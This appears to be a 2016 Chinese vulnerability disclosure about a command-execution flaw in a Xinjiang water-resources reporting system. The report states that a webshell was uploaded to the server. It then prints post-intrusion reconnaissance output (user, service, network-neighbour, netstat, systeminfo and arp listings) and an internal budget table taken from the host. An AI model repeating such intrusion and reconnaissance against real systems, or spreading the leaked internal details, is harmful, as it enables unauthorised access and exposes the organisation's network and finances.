新疆水利厅某系统getshell可入内网

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

 

详细说明:

 

00.png



地址http://**.**.**.**/Report//userlogin.action存在命令执行漏洞

1.png

 

2.png



直接上传木马到服务器中

3.png

 

4.png



code 区域
预算单位	项目分类	预算项目	预算数	剩余指标金额	实际剩余指标金额	剩余计划金额	申请计划	申请直接支付计划	申请授权支付计划	申请实拨计划	已批复计划	已批复直接支付计划	已批复授权支付计划	已批复实拨计划	未批复计划	未批复直接支付计划	未批复授权计划	未批复实拨计划	指标使用%	支付数	直接支付数	授权支付数	实拨数	支付%
115006 新疆大学 001001001001 统发工资支出 A01000010 统发工资支出 3000700 3000700 3000700 0 0 0 0 0 0 0 0 0 0 0 0 0 0.00 0 0 0 0 0.00
001001001002 非统发工资支出 A01000013 非统发工资支出 83133400 69320060 83133400 8813340 13813340 0 13813340 0 8813340 0 13813340 0 5000000 0 0 0 16.62 0 0 0 0 0.00
001001002 社会保障缴费 A01000006 社会保障缴费 24434200 21848400 24434200 2585800 2585800 0 2585800 0 2585800 0 2585800 0 0 0 0 0 10.58 0 0 0 0 0.00
001001003 其他工资福利支出 A01000005 其他工资福利支出 9011500 6928100 9011500 2083400 2083400 500000 1583400 0 2083400 500000 1583400 0 0 0 0 0 23.12 0 0 0 0 0.00
001001004 在职人员地方津贴补贴 A01000008 在职人员地方津贴补贴 76925300 60375300 76925300 3550000 16550000 0 16550000 0 3550000 0 16550000 0 13000000 0 0 0 21.51 0 0 0 0 0.00
001002001 工会经费 A01000004 工会经费 1626300 1430700 1626300 195600 195600 0 195600 0 195600 0 195600 0 0 0 0 0 12.03 0 0 0 0 0.00
001002002 取暖费 A01000009 取暖费 21587000 20182890 21587000 1404110 1404110 100000 1304110 0 1404110 100000 1304110 0 0 0 0 0 6.50 0 0 0 0 0.00
001002003 其他商品服务支出 A01000002 其他商品服务支出 31234900 27262780 31214500 3951720 3972120 1700000 2272120 0 3972120 1700000 2272120 0 0 0 0 0 12.72 20400 0 20400 0 0.07
001003002 非统发离退休 A01000012 未统发离退休 47770900 42993810 47770900 4777090 4777090 0 4777090 0 4777090 0 4777090 0 0 0 0 0 10.00 0 0 0 0 0.00
001003003 住房公积金 A01000011 住房公积金 19657400 18028820 19657400 628580 1628580 0 1628580 0 628580 0 1628580 0 1000000 0 0 0 8.28 0 0 0 0 0.00
001003004 其他对个人和家庭补助支出 A01000007 其他对个人和家庭的补 8895400 8369530 8895400 525870 525870 0 525870 0 525870 0 525870 0 0 0 0 0 5.91 0 0 0 0 0.00
001003005 离退休人地方津贴补贴 A01000003 离退休人员地区津贴补 44986800 40448800 44986800 2038000 4538000 0 4538000 0 2038000 0 4538000 0 2500000 0 0 0 10.09 0 0 0 0 0.00
合 计 ¥372,263,800.00 ¥320,189,890.00 ¥372,243,400.00 ¥30,553,510.00 ¥52,073,910.00 ¥2,300,000.00 ¥49,773,910.00 ¥0.00 ¥30,573,910.00 ¥2,300,000.00 ¥49,773,910.00 ¥0.00 ¥21,500,000.00 ¥0.00 ¥0.00 ¥0.00 ¥20,400.00 ¥0.00 ¥20,400.00 ¥0.00

 

漏洞证明:

 

code 区域
[*] 磁盘列表 [ C:D:E: ]

D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\webapps\Report\Report\> whoami
tianshancwy-sjy\administrator

系统找不到指定的路径。

D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net user

\\TIANSHANCWY-SJY 的用户帐户

-------------------------------------------------------------------------------
admin Administrator Guest
命令成功完成。



D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net start
已经启动以下 Windows 服务:

Alipay payment client security service
Alipay security business service
Alipay security service
Application Experience
Application Management
Background Intelligent Transfer Service
Base Filtering Engine
Certificate Propagation
COM+ Event System
COM+ System Application
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
eoffice
Function Discovery Provider Host
Group Policy Client
IKE and AuthIP IPsec Keying Modules
IP Helper
IPsec Policy Agent
Microsoft Device Health Machine Service
Microsoft Device Health Manager Service
MySQL
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Plug and Play
Power
Print Spooler
Protected Storage
QPCore Service
Remote Desktop Configuration
Remote Desktop Services
Remote Desktop Services UserMode Port Redirector
Remote Procedure Call (RPC)
Remote Registry
RPC Endpoint Mapper
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
Software Protection
SPP Notification Service
SQL Full-text Filter Daemon Launcher (MSSQLSERVER)
SQL Server (MSSQLSERVER)
SQL Server Analysis Services (MSSQLSERVER)
SQL Server Integration Services 10.0
SQL Server Reporting Services (MSSQLSERVER)
SQL Server VSS Writer
SQL Server 代理 (MSSQLSERVER)
System Event Notification Service
Task Scheduler
TBSecSvc
TCP/IP NetBIOS Helper
User Profile Service
VMware Tools Service
Windows Defender
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Management Instrumentation
Windows Remote Management (WS-Management)
Windows Time
Windows Update
Workstation

命令成功完成。



D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net share

共享名 资源 注解

-------------------------------------------------------------------------------
C$ C:\ 默认共享
D$ D:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\Windows 远程管理
命令成功完成。



D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net view
服务器名称 注解

-------------------------------------------------------------------------------
\\CMS-IISFWQ2
\\CMS-SQL
\\CMS-WZQYYFWQ
\\DIANZISW-CMSWZQ
\\EX2
\\EXCHANGE-SERVER
\\GPS-FWQ
\\HL-36C941B2CE5D
\\HL-B175D083CF0A
\\HL-CVS
\\HL-MQR-SERVICE
\\HL-ZIYUANZAIX
\\HONGLIAN-C03544
\\HONGSEWB-FWD
\\HONGSEWB-ZYDH-0
\\KOUAN-YYWFQ
\\KOUAN_DB_03
\\NENGHAO-DLFWQ
\\NENGHAO-TJXTYY
\\NENGHAO-TJXTYY2
\\NENGHAO-TJXTYY3
\\NENGHAO-TJXTYY4
\\NENGHAO-TJXTYY5
\\SANNONG-AFTNSW
\\SANNONG-SHUJUKU
\\SANNONG-SSYQ
\\TIANSHAN-YQWFW
\\TIANSHANCWY-DB
\\TIANSHANCWY-SJY
\\WIN-1SCNCQABLZ1
\\WIN-2XBCFO1024K
\\WIN-3OVL4YUIE9N
\\WIN-87A2YMIO50I
\\WIN-B94JBL25EVP
\\WIN-BBP8VUL8GI1
\\WIN-BKISPR3PAFB
\\WIN-C3PJPGF8MVY
\\WIN-DEPQTJD4SXO
\\WIN-I7V6ATCJED2
\\WIN-KCJKCIRJQAV
\\WIN-T2COU7AFB27
\\WIN-VBHHOZ6HPEQ
\\YONGYOU
\\YUQING-HLWXXCJT
\\YUQING-XXFX-TIA
\\YUQING-XXZHANSH
命令成功完成。



D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> tasklist /svc

映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 232 暂缺
csrss.exe 316 暂缺
wininit.exe 372 暂缺
csrss.exe 380 暂缺
winlogon.exe 408 暂缺
services.exe 468 暂缺
lsass.exe 476 ProtectedStorage, SamSs
lsm.exe 484 暂缺
svchost.exe 580 DcomLaunch, PlugPlay, Power
svchost.exe 656 RpcEptMapper, RpcSs
LogonUI.exe 736 暂缺
svchost.exe 744 Dhcp, eventlog, lmhosts
svchost.exe 796 AeLookupSvc, AppMgmt, BITS, CertPropSvc,
gpsvc, IKEEXT, iphlpsvc, LanmanServer,
ProfSvc, Schedule, seclogon, SENS,
SessionEnv, ShellHWDetection, Winmgmt,
wuauserv
svchost.exe 832 EventSystem, fdPHost, netprofm, nsi,
sppuinotify, W32Time
svchost.exe 884 Netman, TrkWks, UmRdpService, UxSms
svchost.exe 924 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 216 BFE, DPS, MpsSvc
spoolsv.exe 880 Spooler
AlipaySecSvc.exe 1032 AlipaySecSvc
Apache.exe 1116 eoffice
mysqld-nt.exe 1188 MySQL
pcas.exe 1240 pcas
svchost.exe 1292 RemoteRegistry
secbizsrv.exe 1316 secbizsrv
vmtoolsd.exe 1396 VMTools
svchost.exe 2712 TermService
svchost.exe 2752 PolicyAgent
dllhost.exe 2884 COMSysApp
msdtc.exe 3000 MSDTC
svchost.exe 3792 FontCache
sppsvc.exe 3836 sppsvc
svchost.exe 3872 WinDefend
DhMachineSvc.exe 4324 DeviceHealth
DhPluginMgr.exe 2296 DeviceHealthPluginMgr
WmiPrvSE.exe 5424 暂缺
unsecapp.exe 7048 暂缺
csrss.exe 6160 暂缺
winlogon.exe 2660 暂缺
taskhost.exe 6476 暂缺
rdpclip.exe 2072 暂缺
dwm.exe 2064 暂缺
explorer.exe 1736 暂缺
VMwareTray.exe 6044 暂缺
vmtoolsd.exe 428 暂缺
jusched.exe 5664 暂缺
WPService.exe 4708 暂缺
iLook.exe 2656 暂缺
iUpdated.exe 3304 暂缺
TBSecSvc.exe 3440 TBSecSvc
TaobaoProtect.exe 304 暂缺
cmd.exe 4352 暂缺
conhost.exe 4972 暂缺
lcx.exe 4692 暂缺
cmd.exe 4636 暂缺
conhost.exe 2556 暂缺
lcx.exe 1388 暂缺
cmd.exe 4008 暂缺
conhost.exe 3760 暂缺
lcx.exe 6004 暂缺
cmd.exe 6444 暂缺
conhost.exe 6556 暂缺
lcx.exe 4268 暂缺
cmd.exe 4732 暂缺
conhost.exe 1924 暂缺
lcx.exe 4996 暂缺
cmd.exe 4844 暂缺
conhost.exe 3312 暂缺
lcx.exe 3728 暂缺
cmd.exe 1648 暂缺
conhost.exe 2180 暂缺
lcx.exe 5188 暂缺
cmd.exe 6616 暂缺
conhost.exe 300 暂缺
lcx.exe 4068 暂缺
java.exe 5388 暂缺
conhost.exe 4728 暂缺
Apache.exe 2524 暂缺
java.exe 592 暂缺
conhost.exe 4744 暂缺
java.exe 7700 暂缺
conhost.exe 6924 暂缺
java.exe 4144 暂缺
conhost.exe 1820 暂缺
java.exe 2760 暂缺
conhost.exe 2952 暂缺
msmdsrv.exe 5728 MSSQLServerOLAPService
MsDtsSrvr.exe 7176 MsDtsServer100
sqlwriter.exe 2908 SQLWriter
ReportingServicesService. 1128 ReportServer
sqlservr.exe 9208 MSSQLSERVER
fdlauncher.exe 1752 MSSQLFDLauncher
fdhost.exe 1688 暂缺
conhost.exe 1656 暂缺
SQLAGENT.EXE 3540 SQLSERVERAGENT
conhost.exe 1160 暂缺
QQProtect.exe 5036 QPCore
QQ.exe 9816 暂缺
TXPlatform.exe 8428 暂缺
QQExternal.exe 10192 暂缺
QQExternal.exe 9672 暂缺
csrss.exe 3528 暂缺
winlogon.exe 7564 暂缺
taskhost.exe 1308 暂缺
rdpclip.exe 1784 暂缺
dwm.exe 3424 暂缺
explorer.exe 3852 暂缺
VMwareTray.exe 9312 暂缺
FeiQ.exe 1900 暂缺
emedtray.exe 2060 暂缺
jusched.exe 9700 暂缺
iLook.exe 4712 暂缺
iUpdated.exe 9952 暂缺
Alipaybsm.exe 7372 暂缺
java.exe 1988 暂缺
conhost.exe 9372 暂缺
cmd.exe 10232 暂缺
conhost.exe 5616 暂缺
tasklist.exe 8928 暂缺


D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> ipconfig /all

Windows IP 配置

主机名 . . . . . . . . . . . . . : tianshancwy-sjy
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-50-56-92-12-1D
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::1c25:defb:6e88:386f%11(首选)
IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选)
子网掩码 . . . . . . . . . . . . : **.**.**.**
默认网关. . . . . . . . . . . . . : **.**.**.**
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-17-BF-78-4F-00-50-56-92-12-1D
DNS 服务器 . . . . . . . . . . . : **.**.**.**
TCPIP 上的 NetBIOS . . . . . . . : 已启用

隧道适配器 isatap.{751B7224-6201-46C3-A534-75D9AE3A409F}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 本地连接*:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6abd:24e8:907:f57f:9bc3(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::24e8:907:f57f:9bc3%12(首选)
默认网关. . . . . . . . . . . . . : ::
TCPIP 上的 NetBIOS . . . . . . . : 已禁用


D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> netstat -ano

活动连接

协议 本地地址 外部地址 状态 PID
TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 656
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 9208
TCP **.**.**.**:2383 **.**.**.**:0 LISTENING 5728
TCP **.**.**.**:2425 **.**.**.**:0 LISTENING 1900
TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 1188
TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2712
TCP **.**.**.**:8019 **.**.**.**:0 LISTENING 1988
TCP **.**.**.**:8021 **.**.**.**:0 LISTENING 2760
TCP **.**.**.**:8082 **.**.**.**:0 LISTENING 2760
TCP **.**.**.**:8089 **.**.**.**:0 LISTENING 1988
TCP **.**.**.**:8090 **.**.**.**:0 LISTENING 1116
TCP **.**.**.**:8099 **.**.**.**:0 LISTENING 592
TCP **.**.**.**:8100 **.**.**.**:0 LISTENING 2656
TCP **.**.**.**:8101 **.**.**.**:0 LISTENING 4712
TCP **.**.**.**:9080 **.**.**.**:0 LISTENING 592
TCP **.**.**.**:9110 **.**.**.**:0 LISTENING 7700
TCP **.**.**.**:9111 **.**.**.**:0 LISTENING 4144
TCP **.**.**.**:9117 **.**.**.**:0 LISTENING 7700
TCP **.**.**.**:9119 **.**.**.**:0 LISTENING 4144
TCP **.**.**.**:9220 **.**.**.**:0 LISTENING 5388
TCP **.**.**.**:9227 **.**.**.**:0 LISTENING 5388
TCP **.**.**.**:30985 **.**.**.**:0 LISTENING 1900
TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 372
TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 744
TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 796
TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 476
TCP **.**.**.**:49157 **.**.**.**:0 LISTENING 468
TCP **.**.**.**:49158 **.**.**.**:0 LISTENING 2752
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:3389 **.**.**.**:2320 ESTABLISHED 2712
TCP **.**.**.**:8089 **.**.**.**:55324 ESTABLISHED 1988
TCP **.**.**.**:8089 **.**.**.**:55329 ESTABLISHED 1988
TCP **.**.**.**:8089 **.**.**.**:55330 ESTABLISHED 1988
TCP **.**.**.**:8100 **.**.**.**:3331 CLOSE_WAIT 2656
TCP **.**.**.**:8100 **.**.**.**:3605 CLOSE_WAIT 2656
TCP **.**.**.**:8100 **.**.**.**:4864 CLOSE_WAIT 2656
TCP **.**.**.**:9080 **.**.**.**:53690 ESTABLISHED 592
TCP **.**.**.**:9080 **.**.**.**:53693 ESTABLISHED 592
TCP **.**.**.**:9080 **.**.**.**:53695 TIME_WAIT 0
TCP **.**.**.**:9080 **.**.**.**:53703 TIME_WAIT 0
TCP **.**.**.**:9080 **.**.**.**:53705 ESTABLISHED 592
TCP **.**.**.**:9110 **.**.**.**:53696 TIME_WAIT 0
TCP **.**.**.**:9110 **.**.**.**:53697 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53698 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53699 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53700 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53701 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53702 FIN_WAIT_2 7700
TCP **.**.**.**:9110 **.**.**.**:53704 FIN_WAIT_2 7700
TCP **.**.**.**:49548 **.**.**.**:80 CLOSE_WAIT 9816
TCP **.**.**.**:50072 **.**.**.**:1521 ESTABLISHED 4144
TCP **.**.**.**:50110 **.**.**.**:1521 ESTABLISHED 4144
TCP **.**.**.**:50111 **.**.**.**:1521 ESTABLISHED 4144
TCP **.**.**.**:50594 **.**.**.**:443 CLOSE_WAIT 1316
TCP **.**.**.**:50639 **.**.**.**:1521 ESTABLISHED 592
TCP **.**.**.**:50663 **.**.**.**:1521 ESTABLISHED 592
TCP **.**.**.**:50851 **.**.**.**:80 ESTABLISHED 4708
TCP **.**.**.**:51258 **.**.**.**:1521 ESTABLISHED 7700
TCP **.**.**.**:51491 **.**.**.**:1521 ESTABLISHED 7700
TCP **.**.**.**:53085 **.**.**.**:80 CLOSE_WAIT 1240
TCP **.**.**.**:53510 **.**.**.**:1521 ESTABLISHED 5388
TCP **.**.**.**:53531 **.**.**.**:1521 ESTABLISHED 2760
TCP **.**.**.**:53536 **.**.**.**:1521 ESTABLISHED 2760
TCP **.**.**.**:53560 **.**.**.**:1521 ESTABLISHED 5388
TCP **.**.**.**:53568 **.**.**.**:1521 ESTABLISHED 2760
TCP **.**.**.**:53580 **.**.**.**:1521 ESTABLISHED 2760
TCP **.**.**.**:53721 **.**.**.**:80 CLOSE_WAIT 9816
TCP **.**.**.**:54101 **.**.**.**:80 CLOSE_WAIT 304
TCP **.**.**.**:54470 **.**.**.**:139 TIME_WAIT 0
TCP **.**.**.**:54471 **.**.**.**:51 SYN_SENT 4068
TCP **.**.**.**:54472 **.**.**.**:51 SYN_SENT 4996
TCP **.**.**.**:54473 **.**.**.**:51 SYN_SENT 5188
TCP **.**.**.**:54476 **.**.**.**:51 SYN_SENT 1388
TCP **.**.**.**:54477 **.**.**.**:51 SYN_SENT 4268
TCP **.**.**.**:54478 **.**.**.**:51 SYN_SENT 3728
TCP **.**.**.**:54479 **.**.**.**:51 SYN_SENT 6004
TCP **.**.**.**:54480 **.**.**.**:51 SYN_SENT 4692
TCP **.**.**.**:57424 **.**.**.**:1521 ESTABLISHED 592
TCP **.**.**.**:60209 **.**.**.**:1521 ESTABLISHED 4144
TCP **.**.**.**:60379 **.**.**.**:80 CLOSE_WAIT 5664
TCP **.**.**.**:60998 **.**.**.**:80 CLOSE_WAIT 9700
TCP **.**.**.**:63884 **.**.**.**:80 CLOSE_WAIT 9816
TCP **.**.**.**:65170 **.**.**.**:443 CLOSE_WAIT 1316
TCP **.**.**.**:1433 **.**.**.**:52436 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:52437 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:52438 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:52609 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:52789 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:53038 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:53039 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:54226 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:54430 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:54431 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:62736 ESTABLISHED 9208
TCP **.**.**.**:1433 **.**.**.**:64363 ESTABLISHED 9208
TCP **.**.**.**:1434 **.**.**.**:0 LISTENING 9208
TCP **.**.**.**:4300 **.**.**.**:0 LISTENING 9816
TCP **.**.**.**:4301 **.**.**.**:0 LISTENING 9816
TCP **.**.**.**:5550 **.**.**.**:0 LISTENING 2656
TCP **.**.**.**:8002 **.**.**.**:0 LISTENING 2760
TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 1988
TCP **.**.**.**:8055 **.**.**.**:0 LISTENING 592
TCP **.**.**.**:9116 **.**.**.**:0 LISTENING 7700
TCP **.**.**.**:9118 **.**.**.**:0 LISTENING 4144
TCP **.**.**.**:9226 **.**.**.**:0 LISTENING 5388
TCP **.**.**.**:10101 **.**.**.**:0 LISTENING 9816
TCP **.**.**.**:25798 **.**.**.**:0 LISTENING 4712
TCP **.**.**.**:52436 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:52437 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:52438 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:52609 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:52789 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:53038 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:53039 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:54226 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:54312 **.**.**.**:1433 TIME_WAIT 0
TCP **.**.**.**:54313 **.**.**.**:1433 TIME_WAIT 0
TCP **.**.**.**:54430 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:54431 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:62736 **.**.**.**:1433 ESTABLISHED 1988
TCP **.**.**.**:64363 **.**.**.**:1433 ESTABLISHED 1988
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 656
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 9208
TCP [::]:2383 [::]:0 LISTENING 5728
TCP [::]:3389 [::]:0 LISTENING 2712
TCP [::]:9111 [::]:0 LISTENING 4144
TCP [::]:9119 [::]:0 LISTENING 4144
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 372
TCP [::]:49153 [::]:0 LISTENING 744
TCP [::]:49154 [::]:0 LISTENING 796
TCP [::]:49155 [::]:0 LISTENING 476
TCP [::]:49157 [::]:0 LISTENING 468
TCP [::]:49158 [::]:0 LISTENING 2752
TCP [::1]:1434 [::]:0 LISTENING 9208
UDP **.**.**.**:123 *:* 832
UDP **.**.**.**:500 *:* 796
UDP **.**.**.**:2425 *:* 1900
UDP **.**.**.**:4023 *:* 9816
UDP **.**.**.**:4151 *:* 9816
UDP **.**.**.**:4500 *:* 796
UDP **.**.**.**:5355 *:* 924
UDP **.**.**.**:7100 *:* 2656
UDP **.**.**.**:17772 *:* 4712
UDP **.**.**.**:54927 *:* 9816
UDP **.**.**.**:56789 *:* 9816
UDP **.**.**.**:56790 *:* 9816
UDP **.**.**.**:57917 *:* 5036
UDP **.**.**.**:60350 *:* 5036
UDP **.**.**.**:61680 *:* 9816
UDP **.**.**.**:64074 *:* 9816
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
UDP **.**.**.**:54061 *:* 1128
UDP **.**.**.**:62619 *:* 9952
UDP **.**.**.**:63027 *:* 3304
UDP **.**.**.**:64982 *:* 9816
UDP [::]:123 *:* 832
UDP [::]:500 *:* 796
UDP [::]:4500 *:* 796
UDP [::]:5355 *:* 924


D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> systeminfo

主机名: TIANSHANCWY-SJY
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: sannong-aftnsw
注册的组织: HL-soft
产品 ID: 55041-507-6252596-84655
初始安装日期: 2012/8/17, 11:55:19
系统启动时间: 2014/8/21, 20:53:35
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 26 Stepping 4 GenuineIntel ~1995 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2011/9/21
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 4,096 MB
可用的物理内存: 523 MB
虚拟内存: 最大值: 8,189 MB
虚拟内存: 可用: 3,231 MB
虚拟内存: 使用中: 4,958 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: \\TIANSHANCWY-SJY
修补程序: 安装了 75 个修补程序。
[01]: KB977238
[02]: KB982861
[03]: 982861
[04]: KB2425227
[05]: KB2479943
[06]: KB2484033
[07]: KB2488113
[08]: KB2492386
[09]: KB2506014
[10]: KB2506212
[11]: KB2506928
[12]: KB2507618
[13]: KB2509553
[14]: KB2510531
[15]: KB2511250
[16]: KB2511455
[17]: KB2515325
[18]: KB2522422
[19]: KB2533552
[20]: KB2536275
[21]: KB2536276
[22]: KB2541014
[23]: KB2544893
[24]: KB2545698
[25]: KB2547666
[26]: KB2552343
[27]: KB2560656
[28]: KB2563227
[29]: KB2564958
[30]: KB2567680
[31]: KB2570947
[32]: KB2584146
[33]: KB2585542
[34]: KB2603229
[35]: KB2604115
[36]: KB2607047
[37]: KB2608658
[38]: KB2618451
[39]: KB2620704
[40]: KB2620712
[41]: KB2621440
[42]: KB2631813
[43]: KB2633952
[44]: KB2640148
[45]: KB2643719
[46]: KB2644615
[47]: KB2645640
[48]: KB2653956
[49]: KB2654428
[50]: KB2655992
[51]: KB2656356
[52]: KB2656373
[53]: KB2658846
[54]: KB2659262
[55]: KB2660075
[56]: KB2660649
[57]: KB2667402
[58]: KB2676562
[59]: KB2677070
[60]: KB2679255
[61]: KB2685939
[62]: KB2686831
[63]: KB2688338
[64]: KB2690533
[65]: KB2691442
[66]: KB2695962
[67]: KB2698365
[68]: KB2699779
[69]: KB2699988
[70]: KB2709630
[71]: KB2709715
[72]: KB2718523
[73]: KB2718704
[74]: KB2719985
[75]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
[02]: fe80::1c25:defb:6e88:386f


D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> arp -a

接口: **.**.**.** --- 0xb
Internet 地址 物理地址 类型
**.**.**.** 00-50-56-92-7f-32 动态
**.**.**.** 00-50-56-92-7f-35 动态
**.**.**.** 00-50-56-92-7f-37 动态
**.**.**.** 00-50-56-92-45-df 动态
**.**.**.** 00-50-56-92-51-fb 动态
**.**.**.** 00-50-56-92-51-fc 动态
**.**.**.** 00-50-56-92-7f-3e 动态
**.**.**.** 00-50-56-92-12-35 动态
**.**.**.** 00-50-56-92-12-29 动态
**.**.**.** 00-50-56-92-12-2a 动态
**.**.**.** 00-50-56-92-12-24 动态
**.**.**.** 00-50-56-92-12-19 动态
**.**.**.** 00-50-56-92-12-1b 动态
**.**.**.** 00-50-56-92-12-1c 动态
**.**.**.** 00-50-56-92-12-2d 动态
**.**.**.** 00-50-56-92-12-30 动态
**.**.**.** 00-50-56-92-12-1e 动态
**.**.**.**2 00-50-56-92-51-fa 动态
**.**.**.**3 00-50-56-92-7e-de 动态
**.**.**.**7 00-50-56-92-52-3b 动态
**.**.**.** 00-50-56-92-10-06 动态
**.**.**.** 00-50-56-92-7f-40 动态
**.**.**.** 00-15-17-b5-51-e1 动态
**.**.**.** 00-50-56-92-0b-58 动态
**.**.**.** 00-50-56-92-12-3c 动态
**.**.**.** 00-50-56-88-06-eb 动态
**.**.**.** 00-0c-29-97-9b-0b 动态
**.**.**.** 00-0c-29-10-0b-e8 动态
**.**.**.** 00-0c-29-40-b0-db 动态
**.**.**.** 00-0c-29-c3-15-e6 动态
**.**.**.** 00-50-56-92-0b-5c 动态
**.**.**.** 00-50-56-88-37-bb 动态
**.**.**.** 00-50-56-88-06-ee 动态
**.**.**.** 00-50-56-88-06-ea 动态
**.**.**.** 00-50-56-88-64-21 动态
**.**.**.** 00-50-56-88-37-b8 动态
**.**.**.** 00-50-56-88-06-e9 动态
**.**.**.** 00-50-56-88-37-b2 动态
**.**.**.** 00-50-56-88-37-b9 动态
**.**.**.** 00-50-56-88-37-b9 动态
**.**.**.** 00-50-56-88-16-cf 动态
